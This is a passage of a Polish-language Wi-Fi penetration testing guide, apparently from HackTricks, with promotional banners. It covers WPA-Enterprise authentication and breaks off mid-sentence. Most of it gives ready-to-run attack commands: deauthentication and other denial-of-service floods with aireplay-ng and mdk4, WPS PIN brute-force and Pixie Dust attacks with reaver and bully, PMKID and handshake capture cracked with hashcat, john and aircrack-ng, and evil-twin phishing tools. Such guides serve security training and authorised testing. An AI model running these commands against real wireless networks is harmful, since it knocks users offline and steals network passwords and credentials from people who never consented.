58 KiB
Testowanie penetracyjne Wifi
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Dołącz do serwera HackenProof Discord, aby komunikować się z doświadczonymi hakerami i łowcami nagród za błędy!
Spostrzeżenia dotyczące hakerstwa
Zajmuj się treściami, które zagłębiają się w emocje i wyzwania hakerstwa
Aktualności na żywo z hakerstwa
Bądź na bieżąco z szybkim tempem świata hakerstwa dzięki aktualnym wiadomościom i spostrzeżeniom
Najnowsze ogłoszenia
Bądź na bieżąco z najnowszymi programami bug bounty i ważnymi aktualizacjami platformy
Dołącz do nas na Discordzie i zacznij współpracować z najlepszymi hakerami już dziś!
Podstawowe polecenia Wifi
ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
EAPHammer jest narzędziem do ataków na sieci Wi-Fi z wykorzystaniem protokołu EAP. Pozwala na przeprowadzanie ataków typu Evil Twin, Man-in-the-Middle i inne. Narzędzie to jest często używane podczas testów penetracyjnych w celu oceny bezpieczeństwa sieci Wi-Fi.
Link do repozytorium: EAPHammer
Wifiphisher
Wifiphisher jest narzędziem do ataków typu phishing na sieci Wi-Fi. Pozwala na przechwytywanie danych uwierzytelniających użytkowników poprzez tworzenie fałszywych punktów dostępu Wi-Fi. Narzędzie to jest często używane podczas testów penetracyjnych w celu oceny bezpieczeństwa sieci Wi-Fi.
Link do repozytorium: Wifiphisher
Fluxion
Fluxion jest narzędziem do ataków typu Evil Twin na sieci Wi-Fi. Pozwala na przechwytywanie danych uwierzytelniających użytkowników poprzez tworzenie fałszywych punktów dostępu Wi-Fi. Narzędzie to jest często używane podczas testów penetracyjnych w celu oceny bezpieczeństwa sieci Wi-Fi.
Link do repozytorium: Fluxion
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
Airgeddon
Airgeddon jest zaawansowanym narzędziem do testowania penetracyjnego sieci Wi-Fi. Został zaprojektowany w celu ułatwienia procesu testowania bezprzewodowego, oferując szeroki zakres funkcji i możliwości.
Funkcje
- Ataki WPS: Airgeddon umożliwia przeprowadzanie ataków na protokół WPS (Wi-Fi Protected Setup), w tym ataków offline i online.
- Ataki Evil Twin: Narzędzie umożliwia tworzenie fałszywych punktów dostępu (Evil Twin) w celu przechwycenia danych uwierzytelniających.
- Ataki PMKID: Airgeddon obsługuje ataki PMKID, które pozwalają na złamanie hasła sieci Wi-Fi.
- Ataki Handshake: Narzędzie automatyzuje proces przechwytywania i złamania handshake'ów sieci Wi-Fi.
- Ataki Deauth: Airgeddon pozwala na przeprowadzanie ataków deautoryzacyjnych, które mogą wyłączyć urządzenia podłączone do sieci Wi-Fi.
- Ataki Rouge AP: Narzędzie umożliwia tworzenie fałszywych punktów dostępu (Rouge AP) w celu przechwycenia danych uwierzytelniających.
- Ataki Beacon: Airgeddon pozwala na generowanie fałszywych sygnałów Beacon, które mogą wprowadzić w błąd urządzenia w pobliżu.
- Ataki Evil Twin + Rogue AP: Narzędzie umożliwia jednoczesne tworzenie fałszywych punktów dostępu (Evil Twin) i fałszywych punktów dostępu (Rouge AP).
- Ataki WEP: Airgeddon obsługuje ataki na protokół WEP (Wired Equivalent Privacy), który jest podatny na złamanie.
- Ataki WPA/WPA2: Narzędzie umożliwia przeprowadzanie ataków na protokoły WPA/WPA2 (Wi-Fi Protected Access), które są najczęściej stosowane w sieciach Wi-Fi.
Instalacja
Aby zainstalować Airgeddon, wykonaj następujące kroki:
- Sklonuj repozytorium Airgeddon z GitHuba.
- Przejdź do katalogu Airgeddon.
- Uruchom skrypt instalacyjny, który zainstaluje wszystkie niezbędne zależności.
Użycie
Po zainstalowaniu Airgeddon, możesz uruchomić narzędzie, wykonując polecenie ./airgeddon.sh
. Następnie postępuj zgodnie z instrukcjami wyświetlanymi na ekranie, aby wybrać odpowiednie opcje i przeprowadzić ataki na sieci Wi-Fi.
Podsumowanie
Airgeddon to potężne narzędzie do testowania penetracyjnego sieci Wi-Fi, które oferuje wiele funkcji i możliwości. Dzięki niemu możesz przeprowadzać różne ataki na sieci Wi-Fi, w celu zidentyfikowania potencjalnych słabości i zabezpieczeń.
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe
Uruchomienie airgeddon z użyciem dockera
Jeśli nie masz zainstalowanego airgeddon na swoim systemie, możesz łatwo uruchomić go za pomocą dockera. Docker jest platformą, która umożliwia uruchamianie aplikacji w izolowanych kontenerach, co ułatwia zarządzanie zależnościami i środowiskiem uruchomieniowym.
Aby uruchomić airgeddon za pomocą dockera, wykonaj następujące kroki:
-
Upewnij się, że masz zainstalowany docker na swoim systemie. Możesz to sprawdzić, wykonując polecenie
docker --version
w terminalu. Jeśli docker nie jest zainstalowany, zainstaluj go zgodnie z dokumentacją dostępną na stronie https://docs.docker.com/get-docker/. -
Pobierz obraz dockera airgeddon, wykonując polecenie:
docker pull v1s1t0r1sh3r3/airgeddon
-
Po pobraniu obrazu, uruchom airgeddon w kontenerze dockera, wykonując polecenie:
docker run -it --net=host --privileged v1s1t0r1sh3r3/airgeddon
Opcje
--net=host
i--privileged
są wymagane, aby umożliwić kontenerowi dostęp do interfejsów sieciowych i uprawnień do monitorowania ruchu sieciowego. -
Po uruchomieniu kontenera, będziesz mógł korzystać z airgeddon tak samo, jakbyś go miał zainstalowanego na swoim systemie. Możesz wykonywać różne ataki na sieci WiFi, przeprowadzać audyty bezpieczeństwa i wiele innych.
Pamiętaj, że korzystanie z airgeddon lub jakiejkolwiek innej aplikacji do celów nielegalnych lub bez zgody właściciela sieci WiFi jest niezgodne z prawem. Upewnij się, że działasz zgodnie z obowiązującymi przepisami i zawsze uzyskuj odpowiednie uprawnienia i zgodę przed przeprowadzeniem testów penetracyjnych.
docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon
Z: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux
wifiphisher
Może przeprowadzać ataki Evil Twin, KARMA i Known Beacons, a następnie używać szablonu phishingowego, aby uzyskać rzeczywiste hasło sieciowe lub przechwycić dane uwierzytelniające w sieciach społecznościowych.
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies
Wifite2
To narzędzie automatyzuje ataki WPS/WEP/WPA-PSK. Automatycznie:
- Ustawia interfejs w tryb monitorowania
- Skanuje możliwe sieci - i pozwala wybrać ofiarę(y)
- Jeśli WEP - uruchamia ataki WEP
- Jeśli WPA-PSK
- Jeśli WPS: atak Pixie Dust i atak brute-force (bądź ostrożny, atak brute-force może zająć dużo czasu). Należy zauważyć, że nie próbuje pustego PIN-u ani PIN-ów generowanych z bazy danych.
- Próbuje przechwycić PMKID z AP w celu złamania go
- Próbuje deautoryzować klientów AP w celu przechwycenia handshake'u
- Jeśli PMKID lub handshake, próbuje złamać hasło przy użyciu top5000 haseł.
Podsumowanie ataków
- DoS
- Pakiety deautoryzacyjne -- Odłącz wszystkich (lub określony ESSID/Klient)
- Losowe fałszywe AP -- Ukrywa sieci, możliwe zablokowanie skanerów
- Przeciążenie AP -- Próba zniszczenia AP (zazwyczaj mało przydatne)
- WIDS -- Gra z IDS-em
- TKIP, EAPOL -- Kilka konkretnych ataków mających na celu DoS niektórych AP
- Złamanie
- Złamanie WEP (kilka narzędzi i metod)
- WPA-PSK
- WPS pin "Brute-Force"
- WPA PMKID brute force
- [DoS +] Przechwycenie WPA handshake + Złamanie
- WPA-MGT
- Przechwycenie Nazwy użytkownika
- Brute-Force poświadczeń
- Zły bliźniak (z lub bez DoS)
- Otwarty Zły bliźniak [+ DoS] -- Przydatne do przechwycenia danych logowania do portalu przechwytującego i/lub przeprowadzania ataków LAN
- WPA-PSK Zły bliźniak -- Przydatne do ataków sieciowych, jeśli znasz hasło
- WPA-MGT -- Przydatne do przechwycenia poświadczeń firmowych
- KARMA, MANA, Głośny MANA, Znany beacon
- + Otwarty -- Przydatne do przechwycenia danych logowania do portalu przechwytującego i/lub przeprowadzania ataków LAN
- + WPA -- Przydatne do przechwycenia WPA handshake'ów
DOS
Pakiety deautoryzacyjne
Opis z tutaj:.
Ataki deautoryzacyjne, powszechna metoda w hakowaniu Wi-Fi, polegają na fałszowaniu ramek "zarządzających", aby siłą rozłączyć urządzenia z siecią. Te niezaszyfrowane pakiety wprowadzają w błąd klientów, że pochodzą one od prawidłowej sieci, umożliwiając atakującym zbieranie handshake'ów WPA w celu złamania lub trwałego zakłócania połączeń sieciowych. Ta taktyka, zaskakująco prosta, jest szeroko stosowana i ma poważne implikacje dla bezpieczeństwa sieciowego.
Deautoryzacja za pomocą Aireplay-ng
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
- -0 oznacza deautentykację
- 1 to liczba deautentykacji do wysłania (można wysłać ich wiele, jeśli chcesz); 0 oznacza wysyłanie ich ciągle
- -a 00:14:6C:7E:40:80 to adres MAC punktu dostępu
- -c 00:0F:B5:34:30:30 to adres MAC klienta do deautentykacji; jeśli zostanie pominięty, zostanie wysłana deautentykacja rozgłoszeniowa (nie zawsze działa)
- ath0 to nazwa interfejsu
Pakiety rozłączenia
Pakiety rozłączenia, podobnie jak pakiety deautentykacji, są rodzajem ramek zarządzania używanych w sieciach Wi-Fi. Te pakiety służą do zerwania połączenia między urządzeniem (takim jak laptop lub smartfon) a punktem dostępu (AP). Główna różnica między rozłączeniem a deautentykacją polega na ich scenariuszach użycia. Podczas gdy AP emituje pakiety deautentykacji, aby wyraźnie usunąć złośliwe urządzenia z sieci, pakiety rozłączenia są zwykle wysyłane, gdy AP jest wyłączany, restartowany lub przenoszony, co wymaga odłączenia wszystkich podłączonych węzłów.
Ten atak można przeprowadzić za pomocą mdk4 (tryb "d"):
# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
Więcej ataków DOS za pomocą mdk4
Tutaj znajdziesz.
TRYB ATAKU b: Beacon Flooding
Wysyła ramki beacon, aby pokazać fałszywe punkty dostępowe klientom. Czasami może to spowodować awarię skanerów sieciowych i nawet sterowników!
# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m
TRYB ATAKU a: Odmowa uwierzytelnienia
Wysyłanie ramek uwierzytelnienia do wszystkich dostępnych punktów dostępu (AP) w zasięgu może przeciążyć te AP, zwłaszcza gdy zaangażowanych jest wiele klientów. Ten intensywny ruch może prowadzić do niestabilności systemu, powodując zamrożenie lub nawet resetowanie niektórych AP.
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m
TRYB ATAKU p: Sondowanie SSID i Bruteforce
Sondowanie punktów dostępowych (AP) sprawdza, czy SSID jest poprawnie ujawniony i potwierdza zasięg AP. Ta technika, w połączeniu z bruteforcingiem ukrytych SSID z lub bez listy słów, pomaga zidentyfikować i uzyskać dostęp do ukrytych sieci.
TRYB ATAKU m: Wykorzystanie kontramechanizmów Michaela
Wysyłanie losowych lub zduplikowanych pakietów do różnych kolejek QoS może wywołać kontramechanizmy Michaela na AP TKIP, co prowadzi do wyłączenia AP na jedną minutę. Ta metoda jest efektywną taktyką ataku DoS (Denial of Service).
# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]
TRYB ATAKU e: Wstrzykiwanie pakietów EAPOL Start i Logoff
Zalewanie AP (Access Point) ramkami EAPOL Start tworzy fałszywe sesje, przytłaczając AP i blokując prawidłowych klientów. Alternatywnie, wstrzykiwanie fałszywych wiadomości EAPOL Logoff siłą rozłącza klientów, obie metody skutecznie zakłócają usługę sieciową.
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]
TRYB ATAKU s: Ataki na sieci siatkowe IEEE 802.11s
Różne ataki na zarządzanie połączeniem i trasowanie w sieciach siatkowych.
TRYB ATAKU w: Zamieszanie w systemach WIDS
Połączenie klientów z wieloma węzłami WDS lub fałszywymi rogue AP może manipulować systemami wykrywania i zapobiegania włamaniom, tworząc zamieszanie i potencjalne nadużycie systemu.
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]
TRYB ATAKU f: Fuzzer pakietów
Fuzzer pakietów oferuje różnorodne źródła pakietów oraz kompleksowy zestaw modyfikatorów do manipulacji pakietami.
Airggedon
Airgeddon oferuje większość ataków zaproponowanych w poprzednich komentarzach:
WPS
WPS (Wi-Fi Protected Setup) upraszcza proces podłączania urządzeń do routera, zwiększając szybkość i łatwość konfiguracji dla sieci zaszyfrowanych za pomocą WPA lub WPA2 Personal. Jest nieskuteczny dla łatwo podatnego zabezpieczenia WEP. WPS wykorzystuje 8-cyfrowy PIN, który jest sprawdzany w dwóch częściach, co czyni go podatnym na ataki brute-force ze względu na ograniczoną liczbę kombinacji (11 000 możliwości).
Brute-force WPS
Istnieją 2 główne narzędzia do wykonania tej akcji: Reaver i Bully.
- Reaver został zaprojektowany jako solidny i praktyczny atak na WPS i został przetestowany na różnorodnych punktach dostępu i implementacjach WPS.
- Bully to nowa implementacja ataku brute-force na WPS, napisana w języku C. Ma kilka zalet w porównaniu do oryginalnego kodu reavera: mniejsze zależności, poprawioną wydajność pamięci i procesora, poprawne obsługiwanie kolejności bajtów i bardziej rozbudowany zestaw opcji.
Atak wykorzystuje podatność PIN-u WPS, zwłaszcza jego ujawnienie pierwszych czterech cyfr oraz rolę ostatniej cyfry jako sumy kontrolnej, ułatwiając atak brute-force. Jednak obrona przed atakami brute-force, takie jak blokowanie adresów MAC agresywnych atakujących, wymaga rotacji adresów MAC, aby kontynuować atak.
Po uzyskaniu PIN-u WPS za pomocą narzędzi takich jak Bully lub Reaver, atakujący może wydedukować WPA/WPA2 PSK, zapewniając trwały dostęp do sieci.
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
Inteligentne Brute Force
Ta udoskonalona metoda koncentruje się na atakowaniu PIN-ów WPS przy użyciu znanych podatności:
- Wcześniej odkryte PIN-y: Wykorzystaj bazę danych znanych PIN-ów powiązanych z konkretnymi producentami, którzy stosują jednolite PIN-y WPS. Baza danych ta zestawia pierwsze trzy oktety adresów MAC z prawdopodobnymi PIN-ami dla tych producentów.
- Algorytmy generowania PIN-ów: Wykorzystaj algorytmy takie jak ComputePIN i EasyBox, które obliczają PIN-y WPS na podstawie adresu MAC punktu dostępowego (AP). Dodatkowo, algorytm Arcadyan wymaga identyfikatora urządzenia, co dodaje kolejny etap do procesu generowania PIN-ów.
Atak WPS Pixie Dust
Dominique Bongard odkrył wady niektórych punktów dostępowych (AP), dotyczące tworzenia tajnych kodów, znanych jako nonces (E-S1 i E-S2). Jeśli te nonces zostaną odkryte, łatwo jest złamać PIN WPS AP. AP ujawnia PIN w specjalnym kodzie (hash), aby udowodnić, że jest on prawidłowy i nie jest fałszywym (rogue) AP. Te nonces są w zasadzie "kluczami" do odblokowania "sejfu", w którym przechowywany jest PIN WPS. Więcej informacji na ten temat można znaleźć tutaj.
W prostych słowach, problem polega na tym, że niektóre AP nie używają wystarczająco losowych kluczy do szyfrowania PIN-u podczas procesu połączenia. Sprawia to, że PIN jest podatny na zgadywanie spoza sieci (atak brute force offline).
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
Atak Null Pin
Niektóre źle zaprojektowane systemy pozwalają nawet na dostęp za pomocą Null PIN (pustego lub nieistniejącego PIN-u), co jest dość nietypowe. Narzędzie Reaver jest zdolne do testowania tej podatności, w przeciwieństwie do Bully.
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
Airgeddon
Wszystkie proponowane ataki WPS można łatwo przeprowadzić za pomocą airgeddon.
- 5 i 6 pozwalają spróbować własnego PIN-u (jeśli masz taki)
- 7 i 8 wykonują atak Pixie Dust
- 13 pozwala przetestować pusty PIN
- 11 i 12 zbierają PIN-y związane z wybranym AP z dostępnych baz danych i generują możliwe PIN-y za pomocą: ComputePIN, EasyBox i opcjonalnie Arcadyan (zalecane, dlaczego nie?)
- 9 i 10 testują wszystkie możliwe PIN-y
WEP
Obecnie zepsute i nieużywane. Warto wiedzieć, że airgeddon ma opcję WEP o nazwie "All-in-One", która atakuje tego rodzaju zabezpieczenia. Więcej narzędzi oferuje podobne opcje.
Dołącz do serwera HackenProof Discord, aby komunikować się z doświadczonymi hakerami i łowcami błędów!
Wgląd w Hacking
Zajmuj się treściami, które zagłębiają się w emocje i wyzwania związane z hakowaniem
Aktualności o Hackingu na Żywo
Bądź na bieżąco z szybkim tempem świata hakowania dzięki aktualnym wiadomościom i wglądom
Najnowsze Ogłoszenia
Bądź na bieżąco z najnowszymi programami bug bounty i ważnymi aktualizacjami platformy
Dołącz do nas na Discordzie i zacznij współpracować z najlepszymi hakerami już dziś!
WPA/WPA2 PSK
PMKID
W 2018 roku hashcat ujawnił nową metodę ataku, która jest wyjątkowa, ponieważ wymaga tylko jednego pakietu i nie wymaga, aby jakiekolwiek klienty były podłączone do celowego AP - wystarczy interakcja między atakującym a AP.
Wiele nowoczesnych routerów dodaje opcjonalne pole do pierwszej ramki EAPOL podczas łączenia, znane jako Robust Security Network
. Zawiera ono PMKID
.
Jak wyjaśnia oryginalny post, PMKID jest tworzony przy użyciu znanych danych:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Podczas gdy "Nazwa PMK" jest stała, znamy BSSID punktu dostępu i stacji, a PMK
jest identyczny jak w pełnym 4-etapowym handshake'u, hashcat może wykorzystać te informacje do złamania PSK i odzyskania hasła!
Aby zbierać te informacje i przeprowadzić lokalnie atak brutalny na hasło, możesz wykonać:
airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1
Złapane PMKID-y zostaną wyświetlone w konsoli oraz zapisane wewnątrz _ /tmp/attack.pcap_
Teraz przekonwertuj przechwycenie do formatu hashcat/john i złam go:
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Proszę zauważyć, że poprawny format prawidłowego skrótu zawiera 4 części, na przykład: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838
Jeśli twój skrót zawiera tylko 3 części, to jest nieprawidłowy (przechwycenie PMKID nie było prawidłowe).
Zauważ, że hcxdumptool
również przechwytuje handshake'y (coś takiego pojawi się: MP:M1M2 RC:63258 EAPOLTIME:17091
). Możesz przekształcić handshake'y do formatu hashcat/john za pomocą cap2hccapx
.
tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes
Zauważyłem, że niektóre uchwycone potwierdzenia z tym narzędziem nie mogą zostać złamane, nawet jeśli znamy poprawne hasło. Zalecam przechwytywanie potwierdzeń również tradycyjnym sposobem, jeśli to możliwe, lub przechwytywanie kilku z nich za pomocą tego narzędzia.
Przechwytywanie potwierdzeń
Atak na sieci WPA/WPA2 można przeprowadzić, przechwytując potwierdzenie i próbując złamać hasło offline. Proces ten polega na monitorowaniu komunikacji konkretnej sieci i BSSID na określonym kanale. Oto uproszczony przewodnik:
- Zidentyfikuj BSSID, kanał i podłączonego klienta docelowej sieci.
- Użyj polecenia
airodump-ng
, aby monitorować ruch sieciowy na określonym kanale i BSSID, w nadziei na przechwycenie potwierdzenia. Polecenie będzie wyglądać tak:
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
- Aby zwiększyć szansę na przechwycenie handshake'u, chwilowo rozłącz klienta z siecią, aby wymusić ponowną autoryzację. Można to zrobić za pomocą polecenia
aireplay-ng
, które wysyła pakiety deautoryzacyjne do klienta:
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios
Należy zauważyć, że gdy klient zostanie wylogowany, może próbować połączyć się z innym punktem dostępowym lub, w innych przypadkach, z inną siecią.
Gdy w airodump-ng
pojawią się informacje o handshake, oznacza to, że handshake został przechwycony i można zakończyć nasłuchiwanie:
Po przechwyceniu handshake można go łamać przy użyciu aircrack-ng
:
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
Sprawdź, czy w pliku znajduje się handshake
aircrack
aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture
tshark jest narzędziem wiersza poleceń, które jest częścią pakietu Wireshark. Służy do analizy ruchu sieciowego przechwyconego przez interfejs sieciowy lub wczytanego z pliku. Może być używany do monitorowania i debugowania sieci, a także do wykrywania i analizy ataków sieciowych. Tshark oferuje wiele funkcji, takich jak filtrowanie pakietów, analiza protokołów, generowanie statystyk i wiele innych. Jest to potężne narzędzie, które może być wykorzystane w celach pentestingu i badania bezpieczeństwa sieci.
tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.
cowpatty -r psk-01.cap -s "ESSID" -f -
Jeśli narzędzie to znajdzie niekompletny handshake ESSID przed kompletnym, nie wykryje poprawnego.
pyrit
apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze
WPA Enterprise (MGT)
W firmowych konfiguracjach WiFi spotkasz się z różnymi metodami uwierzytelniania, z których każda zapewnia różne poziomy bezpieczeństwa i funkcje zarządzania. Podczas korzystania z narzędzi takich jak airodump-ng
do analizy ruchu sieciowego, możesz zauważyć identyfikatory tych typów uwierzytelniania. Niektóre powszechne metody to:
6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi
- EAP-GTC (Generic Token Card):
- Ta metoda obsługuje tokeny sprzętowe i jednorazowe hasła w ramach EAP-PEAP. W przeciwieństwie do MSCHAPv2, nie używa wyzwania dla klienta i wysyła hasła w postaci zwykłego tekstu do punktu dostępu, co stanowi ryzyko ataków downgrade.
- EAP-MD5 (Message Digest 5):
- Polega na wysyłaniu skrótu MD5 hasła przez klienta. Nie jest zalecane ze względu na podatność na ataki słownikowe, brak uwierzytelniania serwera i brak możliwości generowania sesyjnych kluczy WEP.
- EAP-TLS (Transport Layer Security):
- Wykorzystuje zarówno certyfikaty po stronie klienta, jak i serwera do uwierzytelniania i może dynamicznie generować klucze WEP oparte na użytkowniku i sesji w celu zabezpieczenia komunikacji.
- EAP-TTLS (Tunneled Transport Layer Security):
- Zapewnia uwierzytelnianie wzajemne za pomocą tunelu szyfrowanego oraz metody do generowania dynamicznych, użytkownikowych, sesyjnych kluczy WEP. Wymaga tylko certyfikatów po stronie serwera, a klienci używają poświadczeń.
- PEAP (Protected Extensible Authentication Protocol):
- Działa podobnie jak EAP, tworząc tunel TLS do chronionej komunikacji. Pozwala na użycie słabszych protokołów uwierzytelniania na szczycie EAP dzięki ochronie oferowanej przez tunel.
- PEAP-MSCHAPv2: Często nazywane PEAP, łączy podatny mechanizm wyzwania/odpowiedzi MSCHAPv2 z ochronnym tunelem TLS.
- PEAP-EAP-TLS (lub PEAP-TLS): Podobne do EAP-TLS, ale inicjuje tunel TLS przed wymianą certyfikatów, oferując dodatkową warstwę zabezpieczeń.
Więcej informacji na temat tych metod uwierzytelniania można znaleźć tutaj i tutaj.
Przechwytywanie nazwy użytkownika
Czytając https://tools.ietf.org/html/rfc3748#page-27, wygląda na to, że jeśli używasz EAP, wiadomości "Identity" muszą być obsługiwane, a nazwa użytkownika zostanie wysłana w czystej postaci w wiadomościach "Response Identity".
Nawet przy użyciu jednej z najbardziej bezpiecznych metod uwierzytelniania: PEAP-EAP-TLS, możliwe jest przechwycenie nazwy użytkownika wysłanej w protokole EAP. Aby to zrobić, przechwyć komunikację uwierzytelniania (uruchom airodump-ng
na kanale i wireshark
na tej samej karcie sieciowej) i filtrować pakiety według eapol
.
Wewnątrz pakietu "Response, Identity" pojawi się nazwa użytkownika klienta.
Anonimowe tożsamości
Ukrywanie tożsamości jest obsługiwane zarówno przez EAP-PEAP, jak i EAP-TTLS. W kontekście sieci WiFi, żądanie EAP-Identity jest zazwyczaj inicjowane przez punkt dostępu (AP) podczas procesu łączenia. Aby zapewnić ochronę anonimowości użytkownika, odpowiedź klienta EAP na urządzeniu użytkownika zawiera tylko niezbędne informacje wymagane do przetworzenia żądania przez początkowy serwer RADIUS. Ten koncept jest ilustrowany przez następujące scenariusze:
- EAP-Identity = anonymous
- W tym scenariuszu wszyscy użytkownicy używają pseudonimu "anonymous" jako identyfikatora użytkownika. Początkowy serwer RADIUS działa jako serwer EAP-PEAP lub EAP-TTLS, odpowiedzialny za zarządzanie stroną serwerową protokołu PEAP lub TTLS. Wewnętrzna (chroniona) metoda uwierzytelniania jest następnie obsługiwana lokalnie lub przekazywana do zdalnego (domowego) serwera RADIUS.
- EAP-Identity = anonymous@realm_x
-
W tej sytuacji użytkownicy z różnych domen ukrywają swoje tożsamości, jednocześnie wskazując swoje odpowiednie domeny. Pozwala to początkowemu serwerowi RADIUS na przekierowanie żądań EAP-PEAP lub EAP-TTLS do serwerów RADIUS w ich domenach macierzystych, które działają jako serwer PEAP lub TTLS. Początkowy serwer RADIUS działa wyłącznie jako węzeł przekaźnika RADIUS.
-
Alternatywnie, początkowy serwer RADIUS może działać jako serwer EAP-PEAP lub EAP-TTLS i obsługiwać metodę uwierzytelniania lub przekazywać ją do innego serwera. Ta opcja ułatwia konfigurację różnych polityk dla różnych domen.
W przypadku EAP-PEAP, po ustanowieniu tunelu TLS między serwerem PEAP a klientem PEAP, serwer PEAP inicjuje żądanie EAP-Identity i przesyła je przez tunel TLS. Klient odpowiada na to drugie żądanie EAP-Identity, wysyłając odpowiedź EAP-Identity zawierającą prawdziwą tożsamość użytkownika przez zaszyfrowany tunel. Ta metoda skutecznie zapobiega ujawnieniu rzeczywistej tożsamości użytkownika osobom podsłuchującym ruch 802.11.
EAP-TTLS stosuje nieco inny procedurę. W przypadku EAP-TTLS klient zazwyczaj uwierzytelnia się za pomocą PAP lub CHAP, zabezpieczonych przez tunel TLS. W tym przypadku klient do wiadomości TLS wysyłanej po ustanowieniu tunelu dodaje atrybut User-Name oraz atrybut Password lub CHAP-Password.
Bez względu na wybrany protokół, serwer PEAP/TTLS uzyskuje wiedzę o prawdziwej tożsamości użytkownika po ustanowieniu tunelu TLS. Prawdziwa tożsamość może być reprezentowana jako użytkownik@domena lub po prostu użytkownik. Jeśli serwer PEAP/TTLS jest również odpowiedzialny za uwierzytelnianie użytkownika, teraz posiada tożsamość użytkownika i kontynuuje metodę uwierzytelniania chronioną przez tunel TLS. Alternatywnie, serwer PEAP/TTLS może przekazać nowe żądanie RADIUS do domowego serwera RADIUS użytkownika. Nowe żądanie RADIUS pomija warstwę protokołu PEAP lub TTLS. W przypadkach, gdy chroniona metoda uwierzytelniania to EAP, wewnętrzne wiadomości EAP są przesyłane do domowego serwera RADIUS bez opakowania EAP-PEAP lub EAP-TTLS. Atrybut User-Name wychodzącej wiadomości RADIUS zawiera prawdziwą tożsamość użytkownika, zastępując anonimowy atrybut User-Name z przychodzącego żądania RADIUS. Gdy chroniona metoda uwierzytelniania to PAP lub CHAP (obsługiwane tylko przez TTLS), atrybuty User-Name i inne atrybuty uwierzytelniania wyodrębnione z 